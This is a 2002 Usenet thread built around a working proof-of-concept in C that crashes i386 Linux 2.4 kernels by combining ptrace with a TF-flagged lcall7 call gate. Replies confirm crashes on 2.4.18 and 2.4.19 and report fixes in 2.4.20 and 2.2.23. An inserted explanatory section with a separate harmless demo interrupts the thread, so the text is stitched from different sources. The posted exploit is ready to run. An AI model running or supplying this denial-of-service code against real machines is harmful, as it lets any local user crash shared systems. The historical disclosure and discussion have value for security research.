
i386 linux kernel proof-of-concept DoS


Christophe Devine

Nov 11, 2002, 7:22:23 PM
/* This DoS actually works, so - USE AT YOUR OWN RISK ! */

#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* i386 register layout as returned by PTRACE_GETREGS on a 2.4-era kernel;
   defined here because <sys/user.h> is not included. */
struct user_regs_struct {
    long ebx, ecx, edx, esi, edi, ebp, eax;
    unsigned short ds, __ds, es, __es;
    unsigned short fs, __fs, gs, __gs;
    long orig_eax, eip;
    unsigned short cs, __cs;
    long eflags, esp;
    unsigned short ss, __ss;
};

int main( void )
{
    /* "lcall $0x7, $0x0": a far call through selector 7, the lcall7 call gate */
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    /* the bytes live on the stack, so this needs an executable stack */
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;
    int pid;

    if( ! ( pid = fork() ) )
    {
        /* child: give the parent time to attach, then enter the call gate */
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        /* parent: trace the child and re-set TF in its EFLAGS at every syscall stop */
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags = 0xFFFF; /* set TF flag (bit 8); the other low flag bits come along */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}
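The PoC above combines two ingredients; the following takes them apart into two harmless pieces. This is an added example, not code from Christophe Devine's post. It decodes the 7-byte far call to show which descriptor the lcall7 gate is reached through (selector 0x0007 is index 0 in the LDT with RPL 3, the slot where the 2.4 i386 kernel kept its lcall7 call gate), and it sets TF in a traced child's EFLAGS through PTRACE_GETREGS/PTRACE_SETREGS exactly as the PoC does, but lets the child run ordinary user-mode instructions instead of entering the call gate, so the only effect is a stream of single-step SIGTRAPs delivered to the tracer. It assumes Linux on i386 or x86_64 with ptrace() permitted (the step counter returns -1 where it is not); the lcall bytes are copied from the post, everything else is constructed for the example.

```c
/* Added example (not from the original post): the PoC's two ingredients,
 * shown separately and without the crash.
 * Assumes Linux on x86 (i386 or x86_64) and that ptrace() is permitted. */
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#define X86_EFLAGS_TF 0x100UL   /* bit 8 of EFLAGS: trap after every instruction */

/* 1. Decode the 32-bit far call "9A <offset32> <selector16>" used by the PoC. */
struct far_ptr {
    uint32_t offset;
    uint16_t selector;
    unsigned index, ti, rpl;    /* selector fields: descriptor index, table (0=GDT, 1=LDT), RPL */
};

int decode_far_call(const unsigned char *code, size_t len, struct far_ptr *out)
{
    if (len < 7 || code[0] != 0x9A)
        return -1;
    out->offset   = (uint32_t)code[1] | (uint32_t)code[2] << 8 |
                    (uint32_t)code[3] << 16 | (uint32_t)code[4] << 24;
    out->selector = (uint16_t)(code[5] | code[6] << 8);
    out->index    = out->selector >> 3;
    out->ti       = (out->selector >> 2) & 1;
    out->rpl      = out->selector & 3;
    return 0;
}

/* 2. Set TF in a traced child's EFLAGS through PTRACE_SETREGS, as the PoC does,
 * then count the single-step SIGTRAPs the tracer receives while the child runs
 * ordinary user-mode instructions.  Returns the number of steps seen before the
 * child exits, or -1 if fork/ptrace is unavailable (e.g. a sandbox forbids it). */
long count_tf_steps(void)
{
#if defined(__x86_64__) || defined(__i386__)
    struct user_regs_struct regs;
    long steps = 0;
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0)
            _exit(127);
        raise(SIGSTOP);                                 /* let the tracer set TF first */
        __asm__ volatile("nop\n\tnop\n\tnop\n\tnop");   /* guarantees at least 4 traps */
        _exit(0);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status))
        return -1;                                      /* child never reached the SIGSTOP */

    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) < 0)
        goto fail;
    regs.eflags |= X86_EFLAGS_TF;                       /* the PoC's d.eflags = 0xFFFF, minus the noise */
    if (ptrace(PTRACE_SETREGS, pid, NULL, &regs) < 0)
        goto fail;

    for (;;) {
        /* Resume with signal 0 so the pending SIGSTOP/SIGTRAP is swallowed; it is the
         * child's own TF, not PTRACE_SINGLESTEP, that makes the CPU trap. */
        if (ptrace(PTRACE_CONT, pid, NULL, (void *)0) < 0)
            goto fail;
        if (waitpid(pid, &status, 0) < 0)
            goto fail;
        if (WIFEXITED(status) || WIFSIGNALED(status))
            return steps;
        if (WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP)
            steps++;
    }
fail:
    kill(pid, SIGKILL);
    waitpid(pid, &status, 0);
    return -1;
#else
    return -1;                                          /* EFLAGS.TF is an x86 notion */
#endif
}

int main(void)
{
    /* The PoC's call-gate bytes, copied from the post above. */
    static const unsigned char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    struct far_ptr fp;
    long n;

    if (decode_far_call(dos, sizeof dos - 1, &fp) == 0)
        printf("lcall selector=0x%04x (index %u, %s, RPL %u) offset=0x%08x\n",
               fp.selector, fp.index, fp.ti ? "LDT" : "GDT", fp.rpl, fp.offset);
    n = count_tf_steps();
    if (n < 0)
        printf("ptrace demo unavailable on this system\n");
    else
        printf("child single-stepped %ld instructions after TF was set via PTRACE_SETREGS\n", n);
    return 0;
}
```

Build with `cc -o tf_demo tf_demo.c` and run it unprivileged. The exact step count depends on how many instructions libc's raise() and _exit() paths execute after TF is set, so only the four nops give a hard lower bound. The crash reported in this thread needs the ingredient the demo deliberately leaves out: entering the kernel through the lcall7 gate while TF is set.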

Luke Vogel

Nov 12, 2002, 3:39:11 AM
Christophe Devine wrote:
>
> /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
>

Isn't this the OLD ptrace vulnerability that has been fixed since ...
ummm ... 2.4.2 or thereabouts?

--
Regards
Luke
------
When I die, I want to die like my Grandmother who died peacefully
in her sleep. Not screaming like all the passengers in her car.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
------

Christophe Devine

Nov 12, 2002, 8:45:04 AM
In article <3DD0BE2F...@bell-bird.com.au>, Luke Vogel wrote:

> Isn't this the OLD ptrace vulnerability that has been fixed since ...
> ummm ... 2.4.2 or thereabouts?

Not really;

"Linux Kernel 2.4 System Call TF Flag Denial Of Service Vulnerability"

http://online.securityfocus.com/bid/6115

--
Christophe Devine

Markus Weber

Nov 12, 2002, 10:12:22 AM
> "Linux Kernel 2.4 System Call TF Flag Denial Of Service Vulnerability"
>
> http://online.securityfocus.com/bid/6115
>

Yes, crashed my 2.4.18-3 Red Hat kernel :-)


2Host.com - Robert

Nov 12, 2002, 12:38:29 PM

Luke Vogel wrote:
>
> Christophe Devine wrote:
> >
> > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
> >
>
> Isn't this the OLD ptrace vulnerability that has been fixed since ...
> > ummm ... 2.4.2 or thereabouts?
>

Nope, this is still vulnerable. It'll work on at least 2.4.19.
--
Regards,
Robert McGregor - Email: admin@(remove)2host.com. Phone: 530-941-0690
Server admin, support & programming for shared & dedicated web servers
Secure, reliable hosting you expect and deserve! http://www.2host.com

2Host.com - Robert

Nov 12, 2002, 12:45:00 PM

"2Host.com - Robert" wrote:
>
> Luke Vogel wrote:
> >
> > Christophe Devine wrote:
> > >
> > > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
> > >
> >
> > Isn't this the OLD ptrace vulnerability that has been fixed since ...
> > > ummm ... 2.4.2 or thereabouts?
> >
>
> Nope, this is still vulnerable. It'll work on at least 2.4.19.

^^^^^^^^^^

That's to say, I have confirmed the above code works successfully on 2.4.19.

Christophe Devine

Nov 12, 2002, 12:55:17 PM
In article <3DD13E1C.1F0444C0@-NOSPAM-2host.com>, 2Host.com - Robert wrote:

> That's to say, I have confirmed the above code works successfully on
> 2.4.19.

This is indeed regrettable - I believed the kernel guys had properly fixed
this bug in 2.4.19; looks like they blew it.

Jem Berkes

Nov 29, 2002, 1:08:54 PM
>> > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
>> >
>>
>> Isn't this the OLD ptrace vulnerability that has been fixed since ...
>> ummm ... 2.4.2 or thereabouts?
>>
>
> Nope, this is still vulnerable. It'll work on at least 2.4.19.

I just tested it on 2.4.20 (released yesterday) and it appears that this
has been fixed. I cannot crash my system with the supplied program.

--
Jem Berkes
http://www.pc-tools.net/
Windows, Linux & UNIX software

Jon Portnoy

Nov 30, 2002, 12:24:10 AM
In article <Xns92D57B9A14D9...@205.200.16.73>, Jem Berkes wrote:
>>> > /* This DoS actually works, so - USE AT YOUR OWN RISK ! */
>>> >
>>>
>>> Isn't this the OLD ptrace vulnerability that has been fixed since ...
>>> ummm ... 2.4.2 or thereabouts?
>>>
>>
>> Nope, this is still vulnerable. It'll work on at least 2.4.19.
>
> I just tested it on 2.4.20 (released yesterday) and it appears that this
> has been fixed. I can not crash my system with the supplied program.
>

It was fixed as of 2.4.20-rc2 (and 2.2.23 is also fixed I believe).

--
Jon Portnoy

Wojtek Walczak

Nov 30, 2002, 9:26:29 AM
On 30 Nov 2002 05:24:10 GMT, Jon Portnoy wrote:
> It was fixed as of 2.4.20-rc2 (and 2.2.23 is also fixed I believe).
It's fixed from 2.2.23-rc2.

--
[ ] gminick (at) underground.org.pl http://gminick.linuxsecurity.pl/ [ ]
[ "I just like the solitude of the morning, because that's when coffee tastes best." ]
